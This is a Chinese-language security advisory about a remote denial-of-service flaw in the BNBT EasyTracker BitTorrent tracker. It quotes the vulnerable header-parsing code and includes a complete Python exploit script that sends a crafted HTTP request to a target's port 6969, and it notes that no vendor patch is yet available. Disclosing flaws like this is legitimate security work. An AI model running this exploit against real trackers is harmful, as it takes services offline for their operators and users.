BNBT EasyTracker远程拒绝服务漏洞
来源:岁月联盟
时间:2005-09-01
Trevor Hogan BNBT 7.7 r3.2004.10.27
Trevor Hogan BNBT 7.5 Beta Release 3
Trevor Hogan BNBT 7.5 Beta Release 2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14700
BNBT是最初Python BitTorrent Tracker的C++移植,用于管理BT下载。
BNBT中存在拒绝服务漏洞,特制的HTTP请求可以导致BNBT服务器停止响应。
发送类似于“GET /index.htm HTTP/1.1/r/n:/r/n/r/n”之类的请求会导致这个漏洞。漏洞位于client.cpp的“//grab headers”部分:
// grab headers
string :: size_type iNewLine = m_strReceiveBuf.find( "/r/n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "/r/n/r/n" );
strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "/r/n" ),
iDoubleNewLine - iNewLine - strlen( "/r/n" ) );
while( 1 )
{
string :: size_type iSplit = strTemp.find( ":" );
string :: size_type iEnd = strTemp.find( "/r/n" );
if( iSplit == string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)/n" );
break;
}
string strKey = strTemp.substr( 0, iSplit );
string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
strlen( "/r/n" ) );//Bug here ??
rqst.mapHeaders.insert( pair( strKey, strValue ) );
strTemp = strTemp.substr( iEnd + strlen( "/r/n" ) );
if( iEnd == string :: npos )
break;
}
<*来源:Sowhat (smaillist@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112542080127451&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org
# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/
import sys
import string
import socket
if (len(sys.argv) != 2):
print "/nUsage: " + sys.argv[0] + " TargetIP/n"
print "##################################################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##################################################################"
sys.exit(0)
host = sys.argv[1]
port = 6969
payload = "GET /index.htm HTTP/1.1/r/n:/r/n/r/n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)
建议:
--------------------------------------------------------------------------------
厂商补丁:
Trevor Hogan
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://bnbt.go-dedicated.com/
